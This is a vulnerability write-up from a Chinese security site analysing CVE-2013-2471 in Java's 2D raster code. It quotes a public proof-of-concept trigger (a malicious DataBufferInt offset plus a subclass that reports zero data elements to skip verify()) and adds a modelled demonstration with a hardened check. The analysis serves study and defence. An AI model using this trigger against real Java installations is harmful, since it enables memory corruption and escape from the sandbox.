CVE-2013-2471 vulnerability analysis - vulnerability warning - 黑吧安全网 (myhack58)

2013-08-21T00:00:00
ID MYHACK58:62201340220
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-08-21T00:00:00

Description

1, Introduction

Java vulnerabilities have not been covered here before, so this is a brief analysis of the recent CVE-2013-2471 as a way of learning the principles behind this class of Java bug. The POC comes from http://packetstormsecurity.com/files/122806/.

PS: thanks to oo for the help.

2, Cause of the vulnerability

The code that triggers the vulnerability:

// code in MyJApplet.java
DataBufferInt dst = new DataBufferInt(new int[4], 4, 14 + (_is64 ? 4 : 0));
int[] a = new int[16];
DataBufferInt src = new DataBufferInt(2);
src.setElem(1, -1);
DirectColorModel cm = (DirectColorModel) ColorModel.getRGBdefault();
SinglePixelPackedSampleModel sm1 = new SinglePixelPackedSampleModel(DataBuffer.TYPE_INT, 1, 2, 1, cm.getMasks());
WritableRaster wr1 = Raster.createWritableRaster(sm1, src, null);
MySampleModel sm2 = new MySampleModel(DataBuffer.TYPE_INT, 1, 2, _is7u17 ? 1 : 0x80000001, cm.getMasks());
WritableRaster wr2 = Raster.createWritableRaster(sm2, dst, null);
CompositeContext cc = java.awt.AlphaComposite.Src.createContext(cm, cm, null);
cc.compose(wr1, wr2, wr2);

The POC first constructs a malicious DataBufferInt dst whose backing array holds only 4 ints, but gives it an initial offset of 14 (18 when _is64 is set). Normally this offset is checked for validity before any write goes through it.

To bypass that validation, the POC defines a malicious class MySampleModel that overrides (not overloads) the getNumDataElements method of SinglePixelPackedSampleModel so that it returns 0. Compared with the original method:

class MySampleModel extends SinglePixelPackedSampleModel {
    // constructor pass-through, elided in the original excerpt; matches the
    // five-argument call made from MyJApplet.java above
    MySampleModel(int dataType, int w, int h, int scanlineStride, int[] bitMasks) {
        super(dataType, w, h, scanlineStride, bitMasks);
    }

    public int getNumDataElements() {
        return 0;
    }
}

public class SinglePixelPackedSampleModel extends SampleModel {
    public int getNumDataElements() {
        return 1;
    }
}

When Raster.createWritableRaster is called to create the WritableRaster wr2:

public static WritableRaster createWritableRaster(SampleModel sm, DataBuffer db, Point location) {
    ...
    case DataBuffer.TYPE_INT:
        return new IntegerInterleavedRaster(sm, db, location);
    ...
}

it ends up in the IntegerInterleavedRaster constructor, which builds the malicious WritableRaster:

public IntegerInterleavedRaster(SampleModel sampleModel, DataBuffer dataBuffer, Rectangle aRegion,
                                Point origin, IntegerInterleavedRaster parent) {
    super(sampleModel, dataBuffer, aRegion, origin, parent);
    this.maxX = minX + width;
    this.maxY = minY + height;
    if (!(dataBuffer instanceof DataBufferInt)) {
        throw new RasterFormatException("IntegerInterleavedRasters must have" + "integer DataBuffers");
    }
    DataBufferInt dbi = (DataBufferInt) dataBuffer;
    this.data = stealData(dbi, 0);

    if (sampleModel instanceof SinglePixelPackedSampleModel) {
        SinglePixelPackedSampleModel sppsm = (SinglePixelPackedSampleModel) sampleModel;
        this.scanlineStride = sppsm.getScanlineStride();
        this.pixelStride = 1;
        this.dataOffsets = new int[1];
        this.dataOffsets[0] = dbi.getOffset();
        this.bandOffset = this.dataOffsets[0];
        int xOffset = aRegion.x - origin.x;
        int yOffset = aRegion.y - origin.y;
        dataOffsets[0] += xOffset + yOffset * scanlineStride;
        this.numDataElems = sppsm.getNumDataElements();
    } else {
        throw new RasterFormatException("IntegerInterleavedRasters must have" + "SinglePixelPackedSampleModel");
    }
    verify();
}

Here this.numDataElems = sppsm.getNumDataElements(); dispatches to the overridden method, so numDataElems is initialized to 0. The constructor then calls verify() to check the raster's validity; that method is implemented in the parent class IntegerComponentRaster:

protected final void verify() {
    ...
    int maxSize = 0;
    int size;
    ...
    /* numDataElements is 0, so the loop body never runs and this check is bypassed */
    for (int i = 0; i < numDataElements; i++) {
        if (dataOffsets[i] > (Integer.MAX_VALUE - lastPixelOffset)) {
            throw new RasterFormatException("Incorrect band offset: " + dataOffsets[i]);
        }

        size = lastPixelOffset + dataOffsets[i];

        if (size > maxSize) {
            maxSize = size;
        }
    }
    /* Because the dataOffsets[i] check was bypassed, maxSize stays 0 and data.length is considered legitimate */
    if (data.length < maxSize) {
        throw new RasterFormatException("Data array too small (should be " + maxSize + " )");
    }
}
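The following is an added example, not code from the article, the POC or the JDK. It is a reduced, stand-alone model of the two pieces above: the subclass that lies about getNumDataElements(), and a verify() whose loop is bounded by that lie. Class and field names (SampleModelStub, MySampleModel, RasterState, dataOffsets, numDataElements) mirror the JDK's so the logic is easy to follow, but the bodies are simplified re-implementations written for this example. hardenedVerify() is one possible way to close the hole, not Oracle's patch.

```java
/*
 * Added example (not from the article, the POC or the JDK): a reduced model of
 * the IntegerInterleavedRaster.verify() decision and of the getNumDataElements()
 * override that bypasses it. Names mirror the JDK's; bodies are simplified.
 */
public class VerifyBypassDemo {

    /* Stand-in for SinglePixelPackedSampleModel: one int data element per pixel. */
    static class SampleModelStub {
        int getNumDataElements() { return 1; }
    }

    /* Stand-in for the POC's MySampleModel: same class, count lied about. */
    static class MySampleModel extends SampleModelStub {
        @Override int getNumDataElements() { return 0; }
    }

    /* The fields verify() reads, populated the way the constructor on this page does. */
    static final class RasterState {
        final int[] data;
        final int[] dataOffsets;
        final int width, height, scanlineStride, pixelStride;
        final int numDataElements;

        RasterState(int[] data, int offset, int width, int height,
                    int scanlineStride, SampleModelStub sm) {
            this.data = data;
            this.dataOffsets = new int[] { offset };          // dbi.getOffset()
            this.width = width;
            this.height = height;
            this.scanlineStride = scanlineStride;
            this.pixelStride = 1;
            this.numDataElements = sm.getNumDataElements(); // virtual call: the subclass decides
        }
    }

    /* Same decision as the vulnerable verify(): the loop is bounded by numDataElements,
       a value the attacker's sample model controls. */
    static boolean vulnerableVerify(RasterState r) {
        int lastPixelOffset = (r.height - 1) * r.scanlineStride + (r.width - 1) * r.pixelStride;
        int maxSize = 0;
        for (int i = 0; i < r.numDataElements; i++) {
            if (r.dataOffsets[i] > Integer.MAX_VALUE - lastPixelOffset) {
                return false;                                // "Incorrect band offset"
            }
            int size = lastPixelOffset + r.dataOffsets[i];
            if (size > maxSize) {
                maxSize = size;
            }
        }
        // when numDataElements is 0 the loop never runs, maxSize stays 0 and any array length passes
        return r.data.length >= maxSize;
    }

    /* One way to close the hole: iterate over the offsets the raster actually stores
       (not a count obtained from an overridable callback), reject negative geometry,
       and require room for the last pixel itself. */
    static boolean hardenedVerify(RasterState r) {
        int lastPixelOffset = (r.height - 1) * r.scanlineStride + (r.width - 1) * r.pixelStride;
        if (r.scanlineStride < 0 || lastPixelOffset < 0) {
            return false;
        }
        for (int off : r.dataOffsets) {
            if (off < 0 || off > Integer.MAX_VALUE - lastPixelOffset - 1) {
                return false;
            }
            if (r.data.length <= lastPixelOffset + off) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        int[] backing = new int[4];       // the POC's dst: an array of 4 ints ...
        int offset = 14;                  // ... with an offset of 14 (32-bit case)
        int width = 1, height = 2, scanlineStride = 1;

        RasterState honest = new RasterState(backing, offset, width, height, scanlineStride, new SampleModelStub());
        RasterState lying  = new RasterState(backing, offset, width, height, scanlineStride, new MySampleModel());

        System.out.println("vulnerable verify, honest model : " + vulnerableVerify(honest));
        System.out.println("vulnerable verify, MySampleModel: " + vulnerableVerify(lying));
        System.out.println("hardened verify,   MySampleModel: " + hardenedVerify(lying));
        System.out.println("last pixel would land at index " + (offset + (height - 1) * scanlineStride)
                + " of an array of length " + backing.length);
    }
}
```

With the honest sample model, lastPixelOffset is 1 and the required size is 15, so an array of 4 ints is rejected. With MySampleModel the loop is skipped and the same raster is accepted, even though its last pixel sits at index 15 of a 4-element array. In this pure-Java model a write to that index would merely throw ArrayIndexOutOfBoundsException; in the JDK the compose step runs in native 2D loops that trust the verified offsets, which is why the bypassed check matters.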
